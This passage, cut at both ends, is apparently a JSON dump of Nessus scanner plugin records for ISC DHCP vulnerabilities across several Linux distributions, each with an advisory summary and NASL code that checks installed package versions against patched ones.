ISC DHCP :\n\nInteger overflow in the ISC dhcpd 3.0.x before 3.0.7 and 3.1.x before 3.1.1; and the DHCP server in EMC VMware Workstation before 5.5.5 Build 56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455 and Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075 and ACE 2 before 2.0.1 Build 55017, and Server before 1.0.4 Build 56528; allows remote attackers to cause a denial of service (daemon crash) or execute arbitrary code via a malformed DHCP packet with a large dhcp-max-message-size that triggers a stack-based buffer overflow, related to servers configured to send many DHCP options to clients (CVE-2007-0062).\n\nThis update provides fixes for this vulnerability.", "cvss3": {}, "published": "2009-07-20T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : dhcp (MDVSA-2009:153)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:dhcp-client", "p-cpe:/a:mandriva:linux:dhcp-common", "p-cpe:/a:mandriva:linux:dhcp-devel", "p-cpe:/a:mandriva:linux:dhcp-doc", "p-cpe:/a:mandriva:linux:dhcp-relay", "p-cpe:/a:mandriva:linux:dhcp-server", "cpe:/o:mandriva:linux:2008.1"], "id": "MANDRIVA_MDVSA-2009-153.NASL", "href": "https://www.tenable.com/plugins/nessus/39872", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:153. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39872);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-0062\");\n script_xref(name:\"MDVSA\", value:\"2009:153\");\n\n script_name(english:\"Mandriva Linux Security Advisory : dhcp (MDVSA-2009:153)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in ISC DHCP :\n\nInteger overflow in the ISC dhcpd 3.0.x before 3.0.7 and 3.1.x before\n3.1.1; and the DHCP server in EMC VMware Workstation before 5.5.5\nBuild 56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5\nBuild 56455 and Player 2 before 2.0.1 Build 55017, ACE before 1.0.3\nBuild 54075 and ACE 2 before 2.0.1 Build 55017, and Server before\n1.0.4 Build 56528; allows remote attackers to cause a denial of\nservice (daemon crash) or execute arbitrary code via a malformed DHCP\npacket with a large dhcp-max-message-size that triggers a stack-based\nbuffer overflow, related to servers configured to send many DHCP\noptions to clients (CVE-2007-0062).\n\nThis update provides fixes for this vulnerability.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119,189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dhcp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-client-3.0.7-0.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-common-3.0.7-0.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-devel-3.0.7-0.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-doc-3.0.7-0.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-relay-3.0.7-0.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"dhcp-server-3.0.7-0.1mdv2008.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:11:22", "description": "This update contains a backported patch from dhcp-3.0.7 to fix a buffer overflow which could lead to a denial-of-service condition in cases when the dhcp server is configured to send many DHCP options to clients. (CVE-2007-0062)", "cvss3": {}, "published": "2009-09-24T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : DHCP (ZYPP Patch Number 5975)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_DHCP-5975.NASL", "href": "https://www.tenable.com/plugins/nessus/41501", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41501);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0062\");\n\n script_name(english:\"SuSE 10 Security Update : DHCP (ZYPP Patch Number 5975)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains a backported patch from dhcp-3.0.7 to fix a\nbuffer overflow which could lead to a denial-of-service condition in\ncases when the dhcp server is configured to send many DHCP options to\nclients. (CVE-2007-0062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-0062.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5975.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119,189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dhcp-3.0.3-23.52\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dhcp-client-3.0.3-23.52\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-3.0.3-23.52\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-client-3.0.3-23.52\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-devel-3.0.3-23.52\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-relay-3.0.3-23.52\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-server-3.0.3-23.52\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:54:25", "description": "This update contains a backported patch from dhcp-3.0.7 to fix a buffer overflow which could lead to a denial-of-service condition in cases when the dhcp server is configured to send many DHCP options to clients. (CVE-2007-0062)", "cvss3": {}, "published": "2009-09-24T00:00:00", "type": "nessus", "title": "SuSE9 Security Update : DHCP (YOU Patch Number 12347)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12347.NASL", "href": "https://www.tenable.com/plugins/nessus/41275", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41275);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0062\");\n\n script_name(english:\"SuSE9 Security Update : DHCP (YOU Patch Number 12347)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains a backported patch from dhcp-3.0.7 to fix a\nbuffer overflow which could lead to a denial-of-service condition in\ncases when the dhcp server is configured to send many DHCP options to\nclients. (CVE-2007-0062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-0062.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12347.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119,189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"dhcp-3.0.1rc13-28.24\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"dhcp-client-3.0.1rc13-28.24\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"dhcp-devel-3.0.1rc13-28.24\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"dhcp-relay-3.0.1rc13-28.24\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"dhcp-server-3.0.1rc13-28.24\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:27:54", "description": "The remote host is affected by the vulnerability described in GLSA-200808-05 (ISC DHCP: Denial of Service)\n\n A buffer overflow error was found in ISC DHCP server, that can only be exploited under unusual server configurations where the DHCP server is configured to provide clients with a large set of DHCP options.\n Impact :\n\n A remote attacker could exploit this vulnerability to cause a Denial of Service.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2008-08-07T00:00:00", "type": "nessus", "title": "GLSA-200808-05 : ISC DHCP: Denial of Service", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:dhcp", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200808-05.NASL", "href": "https://www.tenable.com/plugins/nessus/33835", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200808-05.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33835);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-0062\");\n script_xref(name:\"GLSA\", value:\"200808-05\");\n\n script_name(english:\"GLSA-200808-05 : ISC DHCP: Denial of Service\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200808-05\n(ISC DHCP: Denial of Service)\n\n A buffer overflow error was found in ISC DHCP server, that can only be\n exploited under unusual server configurations where the DHCP server is\n configured to provide clients with a large set of DHCP options.\n \nImpact :\n\n A remote attacker could exploit this vulnerability to cause a Denial of\n Service.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200808-05\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All ISC DHCP users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/dhcp-3.1.1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119,189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/dhcp\", unaffected:make_list(\"ge 3.1.1\"), vulnerable:make_list(\"lt 3.1.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ISC DHCP\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:51:37", "description": "This update contains a backported patch from dhcp-3.0.7 to fix a buffer overflow which could lead to a denial-of-service condition in cases when the dhcp server is configured to send many DHCP options to clients. (CVE-2007-0062)", "cvss3": {}, "published": "2009-07-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : dhcp (dhcp-465)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:dhcp", "p-cpe:/a:novell:opensuse:dhcp-client", "p-cpe:/a:novell:opensuse:dhcp-devel", "p-cpe:/a:novell:opensuse:dhcp-relay", "p-cpe:/a:novell:opensuse:dhcp-server", "cpe:/o:novell:opensuse:11.0"], "id": "SUSE_11_0_DHCP-090126.NASL", "href": "https://www.tenable.com/plugins/nessus/39949", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dhcp-465.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39949);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0062\");\n\n script_name(english:\"openSUSE Security Update : dhcp (dhcp-465)\");\n script_summary(english:\"Check for the dhcp-465 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains a backported patch from dhcp-3.0.7 to fix a\nbuffer overflow which could lead to a denial-of-service condition in\ncases when the dhcp server is configured to send many DHCP options to\nclients. (CVE-2007-0062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=410905\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=415346\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119,189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dhcp-3.0.6-86.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dhcp-client-3.0.6-86.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dhcp-devel-3.0.6-86.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dhcp-relay-3.0.6-86.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dhcp-server-3.0.6-86.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhcp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:15:36", "description": "From Red Hat Security Advisory 2009:1154 :\n\nUpdated dhcp packages that fix two security issues are now available for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer overflow flaw in the ISC DHCP client. If the DHCP client were to receive a malicious DHCP response, it could crash or execute arbitrary code with the permissions of the client (root). (CVE-2009-0692)\n\nAn insecure temporary file use flaw was discovered in the DHCP daemon's init script ('/etc/init.d/dhcpd'). A local attacker could use this flaw to overwrite an arbitrary file with the output of the 'dhcpd\n-t' command via a symbolic link attack, if a system administrator executed the DHCP init script with the 'configtest', 'restart', or 'reload' option. (CVE-2009-1893)\n\nUsers of DHCP should upgrade to these updated packages, which contain backported patches to correct these issues.", "cvss3": {}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 3 : dhcp (ELSA-2009-1154)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692", "CVE-2009-1893"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:dhclient", "p-cpe:/a:oracle:linux:dhcp", "p-cpe:/a:oracle:linux:dhcp-devel", "cpe:/o:oracle:linux:3"], "id": "ORACLELINUX_ELSA-2009-1154.NASL", "href": "https://www.tenable.com/plugins/nessus/67891", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:1154 and \n# Oracle Linux Security Advisory ELSA-2009-1154 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67891);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1893\");\n script_bugtraq_id(35668);\n script_xref(name:\"RHSA\", value:\"2009:1154\");\n\n script_name(english:\"Oracle Linux 3 : dhcp (ELSA-2009-1154)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:1154 :\n\nUpdated dhcp packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 3.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to\nreceive a malicious DHCP response, it could crash or execute arbitrary\ncode with the permissions of the client (root). (CVE-2009-0692)\n\nAn insecure temporary file use flaw was discovered in the DHCP\ndaemon's init script ('/etc/init.d/dhcpd'). A local attacker could use\nthis flaw to overwrite an arbitrary file with the output of the 'dhcpd\n-t' command via a symbolic link attack, if a system administrator\nexecuted the DHCP init script with the 'configtest', 'restart', or\n'reload' option. (CVE-2009-1893)\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-July/001076.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(59, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) 